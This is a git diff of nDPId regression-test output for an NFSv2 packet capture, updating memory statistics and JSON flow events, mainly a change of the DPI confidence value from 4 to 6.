~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869733 bytes -~~ total memory freed........: 5869733 bytes -~~ total allocations/frees...: 118124/118124 +~~ total memory allocated....: 6003367 bytes +~~ total memory freed........: 6003367 bytes +~~ total allocations/frees...: 120886/120886 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 2303 chars diff --git a/test/results/nfsv2.pcap.out b/test/results/nfsv2.pcap.out index d3ba753db..ba2fd42c5 100644 --- a/test/results/nfsv2.pcap.out +++ b/test/results/nfsv2.pcap.out @@ -2,40 +2,40 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"nfsv2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":944207338400} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338400,"flow_last_seen":944207338400,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207338400,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3289,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":944207338400,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":944207338400,"pkt":"AMCV+E3TAMCV4Bm+CABFAABcZMIAAEAR0zSLGRYCixkWZgzZAG8ASG3iOEEWnwAAAAAAAAACAAGGoAAAAAMAAAADAAAAAAAAAAAAAAAAAAAAAAABhqUAAAABAAAAA3VkcAAAAAAAAAAAAA=="} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338400,"flow_last_seen":944207338400,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207338400,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3289,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338400,"flow_last_seen":944207338400,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207338400,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3289,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":944207338410,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":944207338410,"pkt":"AMCV4Bm+AMCV+E3TCABFAABMjjQAAEARqdKLGRZmixkWAgBvDNkAOJnwOEEWnwAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAEjEzOS4yNS4yMi4xMDIuNC4yNAAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338410,"flow_last_seen":944207338410,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207338410,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":671,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00586{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":944207338410,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":158,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":158,"pkt_l4_len":124,"thread_ts_msec":944207338410,"pkt":"AMCV+E3TAMCV4Bm+CABFAACQZMMAAEAR0v+LGRYCixkWZgKfBBgAfBoVOEEWnwAAAAAAAAACAAGGpQAAAAEAAAABAAAAAQAAADQ4R3XQAAAACXdlcnJtc2NoZQAAAAAAAAAAAAABAAAABQAAAAEAAAAAAAAAAgAAAAMAAAARAAAAAAAAAAAAAAAUL2hvbWUvZ2lybGljaC9leHBvcnQ="} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338410,"flow_last_seen":944207338410,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207338410,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":671,"dst_port":1048,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338410,"flow_last_seen":944207338410,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207338410,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":671,"dst_port":1048,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":944207338430,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":944207338430,"pkt":"AMCV4Bm+AMCV+E3TCABFAABYjkAAAEARqbqLGRZmixkWAgQYAp8ARO2bOEEWnwAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAQEIUAAAPnAAoAAAAAsloAAAApAAoAAAAAsloAAAAp"} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338440,"flow_last_seen":944207338440,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207338440,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3291,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":944207338440,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":944207338440,"pkt":"AMCV+E3TAMCV4Bm+CABFAABcZMQAAEAR0zKLGRYCixkWZgzbAG8ASNmgOEGq3wAAAAAAAAACAAGGoAAAAAMAAAADAAAAAAAAAAAAAAAAAAAAAAABhqMAAAACAAAAA3VkcAAAAAAAAAAAAA=="} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338440,"flow_last_seen":944207338440,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207338440,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3291,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338440,"flow_last_seen":944207338440,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207338440,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3291,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":944207338450,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":944207338450,"pkt":"AMCV4Bm+AMCV+E3TCABFAABMjkcAAEARqb+LGRZmixkWAgBvDNsAOALjOEGq3wAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAETEzOS4yNS4yMi4xMDIuOC4xAAAA"} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338450,"flow_last_seen":944207338450,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":944207338450,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3292,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":944207338450,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":944207338450,"pkt":"AMCV+E3TAMCV4Bm+CABFAABEZMUAAEAR00mLGRYCixkWZgzcCAEAMD5NOEGq3wAAAAAAAAACAAGGowAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338450,"flow_last_seen":944207338450,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":944207338450,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3292,"dst_port":2049,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338450,"flow_last_seen":944207338450,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":944207338450,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3292,"dst_port":2049,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":944207338450,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":944207338450,"pkt":"AMCV4Bm+AMCV+E3TCABFAAA0jkkAAP8R6tSLGRZmixkWAggBDNwAIMUUOEGq3wAAAAEAAAAAAAAAAAAAAAAAAAAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338490,"flow_last_seen":944207338490,"flow_idle_time":200000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":944207338490,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":1023,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":944207338490,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":944207338490,"pkt":"AMCV+E3TAMCV4Bm+CABFAACYZMYAAP8RE\/SLGRYCixkWZgP\/CAEAhHgyXh0LlAAAAAAAAAACAAGGowAAAAIAAAABAAAAAQAAADQ4R3XQAAAACXdlcnJtc2NoZQAAAAAAAAAAAAABAAAABQAAAAEAAAAAAAAAAgAAAAMAAAARAAAAAAAAAAAAEBCFAAAD5wAKAAAAALJaAAAAKQAKAAAAALJaAAAAKQ=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338490,"flow_last_seen":944207338490,"flow_idle_time":200000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":944207338490,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":1023,"dst_port":2049,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338490,"flow_last_seen":944207338490,"flow_idle_time":200000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":944207338490,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":1023,"dst_port":2049,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":944207338490,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":944207338490,"pkt":"AMCV4Bm+AMCV+E3TCABFAAB8jl8AAP8R6naLGRZmixkWAggBA\/8AaNSdXh0LlAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAEHtAAAAAgAAAAAAAAABAAAAYAAAQAAAAAAAAAAAAAAQEIUAALJaOEd1QgAFMCA4R3VCAAd6EDhHdUIAB3oQ"} 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":944207338490,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":944207338490,"pkt":"AMCV+E3TAMCV4Bm+CABFAACYZMcAAP8RE\/OLGRYCixkWZgP\/CAEAhHghXh0LlQAAAAAAAAACAAGGowAAAAIAAAARAAAAAQAAADQ4R3XQAAAACXdlcnJtc2NoZQAAAAAAAAAAAAABAAAABQAAAAEAAAAAAAAAAgAAAAMAAAARAAAAAAAAAAAAEBCFAAAD5wAKAAAAALJaAAAAKQAKAAAAALJaAAAAKQ=="} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338880,"flow_last_seen":944207338880,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207338880,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3293,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":944207338880,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":944207338880,"pkt":"AMCV+E3TAMCV4Bm+CABFAABcZRAAAEAR0uaLGRYCixkWZgzdAG8ASKDlOErjjgAAAAAAAAACAAGGoAAAAAMAAAADAAAAAAAAAAAAAAAAAAAAAAABhqUAAAABAAAAA3VkcAAAAAAAAAAAAA=="} -00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338880,"flow_last_seen":944207338880,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207338880,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3293,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338880,"flow_last_seen":944207338880,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207338880,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3293,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":944207338890,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":944207338890,"pkt":"AMCV4Bm+AMCV+E3TCABFAABMj1sAAEARqKuLGRZmixkWAgBvDN0AOMzzOErjjgAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAEjEzOS4yNS4yMi4xMDIuNC4yNAAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338890,"flow_last_seen":944207338890,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":686,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00588{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":944207338890,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":158,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":158,"pkt_l4_len":124,"thread_ts_msec":944207338890,"pkt":"AMCV+E3TAMCV4Bm+CABFAACQZRIAAEAR0rCLGRYCixkWZgKuBBgAfE0LOErjjgAAAAAAAAACAAGGpQAAAAEAAAADAAAAAQAAADQ4R3XQAAAACXdlcnJtc2NoZQAAAAAAAAAAAAABAAAABQAAAAEAAAAAAAAAAgAAAAMAAAARAAAAAAAAAAAAAAAUL2hvbWUvZ2lybGljaC9leHBvcnQ="} -00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338890,"flow_last_seen":944207338890,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":686,"dst_port":1048,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207338890,"flow_last_seen":944207338890,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":686,"dst_port":1048,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":944207338890,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":944207338890,"pkt":"AMCV4Bm+AMCV+E3TCABFAAA0j18AAEARqL+LGRZmixkWAgQYAq4AIJpzOErjjgAAAAEAAAAAAAAAAAAAAAAAAAAA"} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338450,"flow_last_seen":944207338450,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3292,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338400,"flow_last_seen":944207338410,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3289,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338440,"flow_last_seen":944207338450,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3291,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 